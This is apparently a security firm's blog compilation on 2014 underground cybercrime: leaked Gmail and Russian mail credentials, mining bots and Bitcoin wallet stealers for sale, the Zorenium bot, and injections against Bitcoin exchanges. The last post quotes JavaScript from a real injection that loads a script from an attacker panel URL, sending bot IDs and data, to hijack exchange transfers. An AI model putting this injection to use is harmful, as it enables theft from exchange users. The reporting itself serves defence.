After the Russian Yandex and Mail.ru, Gmail Accounts are Leaked. Who will be Tomorrow’s Target?

This morning cyber security sources informed us for the third time this week about email addresses and passwords being leaked from a large mail provider. After the Russian services Yandex.ru (one million leaked emails) and Mail.ru (4.5 million leaked emails), came Gmail’s turn – around five million emails were posted on a Russian platform.

According to publications about the Gmail leak, the data was published on a Russian forum that focuses on bitcoin issues – Bitcoin Security. The forum member who uploaded the database is nicknamed tvskit, and he was the first one to publish the data online in all three of the cases.

A short search on the above nickname on social networks revealed a 34-year old man by the name of Ivan Bragin, from the Perm administrative center in Russia. His VK and Twitter pages contain plenty of information regarding crypto-currencies, in addition to a tweet about the Gmail leak linked to the BTC forum. From his posts, it seems that he did not directly connect himself to the leaks, nor did he take credit for stealing the data. Moreover, the story he tells is about running into these email lists on the web, then deleting the passwords and publishing them ‘for the greater good’. It is a strange coincidence that all three lists were found by the same person.

Based on the fact that tvskit‘s real identity was so easy to find (no attempts to hide it from his side), combined with the fact that initially the account list was published without the passwords (“just in order for people to check if their address was on the list”), makes us doubt that he stole the data.

According to several cyber security sources that analyzed the database, some of the compromised mail accounts were either automatically registered or were not active in the past. Nevertheless, some users of the above providers did confirm the authenticity of the logins and passwords.

Yandex and Mail.ru denied any kind of breach of their databases, so the leading hypothesis of the accounts origin is that all three lists were collected over a long period of time, from different sources, maybe along with other, less “attractive” data, that was later sorted by email providers and published online. In addition, we should also consider that at least some of the addresses are fictitious or not valid. At this moment, it is difficult to specify the exact number of addresses with a valid password.

Relying on the information above, we believe that all three lists were obtained by the same person (not necessarily tvskit), who managed to get hold of some valid logins and passwords and then mixed them with non-valid or automatically created addresses to intensify the scale of the leak.

A forum thread Bitcoin Security forum, which cointians the leaked Gmail database on
A forum thread from Bitcoin Security forum, which cointains the leaked Gmail database
Ivan Bragin's Twit linked to the forum post about Gmail leak
Ivan Bragin’s tweet linked to the forum post about the Gmail leak

Exploiting the World of WebMoney

The appearance of virtual money has played in favor of cyber criminals. The level of anonymity provided by crypto currencies is significantly higher than in real money transactions, and leaves much more space for performing illegal activities.

The first and most obvious way to exploit WebMoney and earn an easy profit is to mine virtual currencies via botnets specifically created for the purpose. The underground is awash with different mining bots, miners and mining Trojans for sale (downloads are also available), all of which are designated to infects PCs of naive users and exploit their PC CPU/GPU resources to mine the precious coins. The price range varies widely, starting at $50-$100 for a build of a simple Bitcoin/Litecoin miner, to $400-$500 for more sophisticated malware capable of mining a wider variety of virtual currencies (such as Namecoins, Dogecoins, QuarkCoins, etc.) and reaching $1,000-$1,500 for complete mining kits that can mine coins on processor or video cards, contain UAC bypass and web panel for statistical management of the bots, are signed with a digital certificate, and more.

Litecoin mining Bot
Litecoin mining Bot
"Diamond Axe" - another mining bot
“Diamond Axe” – another mining bot

The abundance of different mining platforms identified over the past year has created some difficulties for those making a living in this area. Prices dropped due to the increase in supply, while in parallel, the miners became more detectable by AV vendors, as a large number of them operate by the same mechanism. We identified forums threads from members looking for alternative methods of money-making, stressing their preference for malware capable of virtual money theft.

This can perhaps shed some light on the shift in the activities of cybercriminals in this area – from creating mining botnets, to stealing coins from web wallets. Indeed, in the last month alone, we identified three different stealers of Bitcoin wallets: *coin Grabber, Stealer coins and Wallet Stealer. While the tools are not very sophisticated, they can cause a great deal of damage. *coin Grabber is designed to steal data (files and passwords) from Bitcoin-QT, MultiBit, Armory and Electrum wallets during the transaction process, and costs $500. Stealer Coins is supposed to search for and steal Bitcoin wallet files and send them to FTP, and is sold for $250. The Wallet Stealer is capable of stealing different kinds of WebMoney (not only Bitcoins) from Armory and MultiBit wallets and bypass UAC, and it costs $600.

The Administration Panel of *coin Grabber
The Administration Panel of *coin Grabber

In conclusion, we should mention again the three injection codes for Bitcoin exchanges that were found on one of the Russian underground forums (we wrote about this in detail about a week ago). This code replaces the values of the send-to-address, send-value and the send button elements, thus exploiting vulnerability on the exchange website.
As time goes by, we are witnessing the evolution of more and more cybercrime tools aimed at the relatively young but very profitable area of web currencies. The simple, easy methods are being abandoned for more complicated ones and new trends are popping up, like in other spheres of the dynamic cyber crime world.

Zorenium Bot: Follow-up

This is a guest post by Dimitry, a forensics expert who will be joining our team soon.

Image

As a follow up to our previous post, here is a quick overview of some of Zorenium’s capabilities.

Please note that as we are still in the process of fully analyzing this bot’s capabilities – the post is mostly based on the information publish by the bot maker.

Without a doubt, one of the most interesting modules to start with would be the FakeShoutDown mechanism. If according to the author indeed it operates as they say it does, then it is definitely a new “way of thinking”.

In essence, the authors of Zorenium are faking the shutdown process of a machine. The code imitates the entire process (once the shutdown sequence isinitiated by the user) including proper images and even, and this is quite fascinating, slowing down the computer fans to eliminate the noise.

In my humble opinion, it is quite impressive.

The bot has multiple interfaces of management (such as IRC and I2P), and all come with a great set of 256 bit AES keys.

Another interesting aspect would be the implementation of the stenography module. The stenography module is not a “regular”, and it makes this bot into more sophisticated than others. I am curious to see how that implementation works.

Another funky aspect of the bot would be what the author called “CHRISTMAS USERKIT4 SPECIAL ADDON”. Amongst the various features, the bot will replicate a new disk drive and will drop the core dll’s onto it. Then it will encrypt the hard drive and thus protect it from various AV and anti-malware mechanisms. Pretty sweet if you ask me.

The cherry on this icecream would be the iOS module. This is definitely the first bot that I have seen that actually operates on “Cross-platforms”. It can infect Android, Windows and iOS systems – a true nightmare to all security specialists. The main question regarding iOS still remains – are only jailbroken phones at risk or is it much, much worse?

Zorenium Bot Coming to the iPhone Nearest to You

Written by Tanya Koyfman and Assaf Keren

Recently our analysts have been monitoring the advancement of a new threat in the commercial malware theater – the Zorenium Bot. Zorenium, a relatively new and unknown bot,  has been for sale on the underground sinceJanuary 2014. This bot will be getting new features in its March 18th update, including, the ability to infect iOS devices (version 5-7), alongside its existing capabilities to run on Linux- and Windows-based machines. The developers have also updated the rootkit to TDL4 (making it vulnerable to anti-TDSS tools).

 zorenium1

Capture of the recent release notifications

Zorenium, a relative of Betabot, is a very robust bot which is still undetected by most AV companies. It has several key abilities, including DDoS, Formgrabbing, Bot-killing, Banking Trojan and Bitcoin mining. The cost of a basic Zorenium bot is 350 GBP and with advanced features (including P2P C&C, i2p C&C and more) it can go up to over 5000GBP.

 zorenium2

Zorenium Payment Plans

According to the developers, it is still in beta mode and more features will be available in time .

 zorenium3

Zorenium Source Screen Capture

Bitcoin Exchange Script Injection Vulnerability

Written by Assaf Keren

It is no secret that Bitcoin is under a lot of scrutiny lately.

Bitcoin
Bitcoin

From publicized breaches of Bitcoin trading sites, to wild fluctuations of the its value, the virtual currency that was considered a hot commodity until very recently is floundering. Perhaps the most alarming story demonstrating the instability of this currency is Mount Gox, once the largest Bitcoin exchange in the world. The site first closed, then filed for bankruptcy, and its CEO’s Twitter account was hacked. With all this controversy, the public is left wondering about the future of Bitcoin and  the level of security the exchange site provides. Naturally, hackers have also taken notice and have started looking for breaches on other Bitcoin exchange sites. Alongside the flurry of phishing emails, Bitcoin mining bots and attempts to hack into Bitcon exchange sites, there is a new trend, utilizing the ability of Trojans to hijack http sessions or plain old XSS and CSRF attacks, the attackers are injecting site-specific code to users and then scan for available funds in the user accounts and steal money from the accounts.

Recently, our analysts have come upon four different injection codes, three for Bitcoin exchanges and one for a betting site. All of these are fashioned in the same way,  and are clearly written by the same author.

Below is an excerpt from one of the injections:

S:function(data){
var s = document.createElement(‘script’);
s.type = ‘text/javascript’;
s.async=false;
s.src = “{HERE_ADMIN_URL}/?s=bitcoin&v=2&m=%BOTNET%&b=%BOTID%&t=”+data+”&rnd=”+Math.random();
s.onerror = s.onload = s.onreadystatechange = function(){
if(!this.loaded && (!this.readyState || this.readyState == ‘loaded’ || this.readyState == ‘complete’)){
this.onerror = this.onload = this.onreadystatechange = null;
}
}
if(document.getElementsByTagName(‘head’).length){ document.getElementsByTagName(‘head’)[0].appendChild(s); }else{ document.appendChild(s); }
}

In the continuation of the code, the attackers change the CSS setting of the site, and replace the values of the send-to-address, send-value and the send button elements. All in all, this is a very simple and elegant code that utilizes the context in which it is run.

This is not a new method of attack – it has been widely used in the past and probably will continue to be used in the future. However, it demands a good understanding of how the exchanges work and how they fashion their web services and it is very version-specific. To the exchanges, however, this is bad news since this targeting of the users is something that they have a limited capability to defend against (unlike attacks on their servers).

The process that the exchanges are going through is very similar to what banks and e-commerce services went through when they started providing Internet services. The problem is that banks have the ability, staff and resources (and insurance) to limit transactions and work with customers on fraud cases, while Bitcoin exchanges do not have that kind of capability yet. Even if a specific attack is stopped, we will probably see more and more attacks on Bitcoin (and other currencies) users. This is just one more step in the evolution of crypto-currency to a more mature state.